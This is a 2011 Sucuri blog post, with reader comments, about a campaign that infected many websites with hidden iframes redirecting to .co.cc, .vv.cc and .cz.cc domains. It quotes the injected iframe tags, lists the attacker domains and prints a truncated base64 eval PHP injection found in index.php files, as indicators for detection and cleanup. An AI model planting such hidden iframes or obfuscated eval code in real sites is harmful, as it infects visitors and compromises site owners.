• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

The attack from the .cc’s domains

February 25, 2011David Dede

FacebookTwitterSubscribe

Over the last few days we’ve continued to see a large increase in the number of sites hacked and infected with a malicious iframe from .co.cc (.vv.cc, .cz.cc, etc) domains.

You can run a free scan using SiteCheck to see if you’ve been infected.

That’s how it looks like on a hacked site:

<iframe src="http://hgerwhu45.co.cc/QQkFBg0AAQ..=" width=”1″ height=”1″>

or

<iframe src="http://gqgqhfdjdh.co.cc/QQkFBg0AAQ..==" width=’1` height=`1″>

The number of domains being used in this attack is quite big and only a few of them are blacklisted by Google, but we already identified those at least:

berfry43bgrbf.vv.cc
burifym.cz.cc
drelagda.vv.cc
g243gtdsgsdg.vv.cc
glkgj5j4rshdfhj.vv.cc
gqgqhfdjdh.co.cc
gs34grsgdg.vv.cc
gsdg3gsdgsdg.vv.cc
gsg3gsdgsxgsdg.vv.cc
gwsg3gsgdsgd.vv.cc
hdsh4hsfhdsj.vv.cc
hgerwhu45.co.cc
hndfdfnfdnxdnf.vv.cc
jfgdhdfhsdfh.vv.cc
jfgjfr5jdfj.vv.cc
keleghma.vv.cc
kulawield.vv.cc
maridora.vv.cc
miraswyn.cz.cc
mkgk5jswhgfnxg.vv.cc
oghmalak.vv.cc
siranaya.vv.cc
lookfeel-201101.co.cc

They change quite often, but on a hacked site, the sign is the same: Redirecting to .cc malicious sites and the following PHP code added to the index.php (among with other backdoors):

<?php eval ( base64_decode("ZXJyb3JfcmV.wb3J0aW5nKDApOw0KJGJv.dCA9IEZBTFNFIDsNC…
c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGl…
kYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW…
5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJ…

The decoded malware is available here: http://tools.sucuri.net/?page=tools&title=blacklist&detail=d08451989a742658b8e5a8c4a3788d88

Here’s our malware definition for it: http://sucuri.net/malware/malware-entry-mwjs488

Cleaning up:

Cleaning up is not very hard, you have to remove the malicious code above from your index.php files, upgrade WordPress (Joomla, osCommerce or whatever web application you are using), change all the passwords and check for backdoors (files that you didn’t add). If you need help doing that (or need someone to do it for you), we offer web site malware removal / clean up services

We will post more details /updates as we learn more.

FacebookTwitterSubscribe

Categories: Website Malware Infections, WordPress SecurityTags: Hacked Websites, Malware Updates

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Reader Interactions

Comments

  1. Regina Smola

    February 26, 2011

    Thanks for posting the information.

    I’m seeing several sites with this same issue. I found a couple nasty trojan horse backdoor executable programs inside various wordpress plugin folders. Example: wp-content/plugins/XML-sitemap/XML-sitemap.exe. It seems that this malware is generating .exe (backdoors) using directory names. Yikes!

  2. Air360

    February 27, 2011

    Thanks for posting this…I have had this attack on EVERY single site of mine….the problem Im seeing though is that even after deleting the code in about an hour it comes back to every site! I was simply replacing the index.php with a clean one from a clean wordpress install.
    I will now go look at my plugins as Regina says there are some backdoors apparently

  3. Bogdan

    March 2, 2011

    I can’t seem to find the backdoor (searched for .exe , .old , .bak files ; also searched plugins folders and uploads folders). Once I clean the files in several hours it gets back. It only infects index.php and index.html, basically all index files. Anyone found the form of the backdoor so far?
    I’ve changed the passwords and it doesn’t seem to be modified via ftp since the modification date of the index.php files remains the same old one even after infection. It must be a wordpress hack .
    Thx

  4. Air360

    March 2, 2011

    I have not found it either. If you have multiple sites on one server make sure it didnt infect another site as the host and then spread across your servers sites. Im thinking it could be somewhere in mysql. What I am planning on doing tonight is setup a brand new subdoain and put a brand new clean wordpress on it and nothing else and make sure not to visit it at all and then monitor the source code and once it updates with the malware go and look at the logs and look at alll the files and try and see if i can find anything in log and any other files that were modified or messed with. Part of the problem I am having is the sites I have on my server all all developed sites…so there is content all over the database and in the directories…so its hard to know whats “wrong” and whats still legit…so hopefully this clean test site i “hope” gets infected will help narrow it down

  5. Creatorul

    March 2, 2011

    This virus is way too good,I’ve pulled my hair out but I can’t give up. Going to disable the sites one by one and see which ones have the backdoor. If the virus doesnt get back then it means that’s the site with the backdoor. Have u noticed any pattern in making it get back? Seems to get back every 2-3 hours after I remove it.

  6. MobileSnap.com

    March 5, 2011

    I just had the same thing happen to my sites. All of my WORDPRESS sites have the cc url’s with the iframe/eval/base64 code in the index.php. I find it crazy to believe that one older version of wordpress would allow access to my server and other directories. Is this what happened? Some non wordpress sites also have the iframe hack in them, while others do not. How do I clean it out? I’m considering just moving some over to another new fresh server. I think deleting everything is the way to go.

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.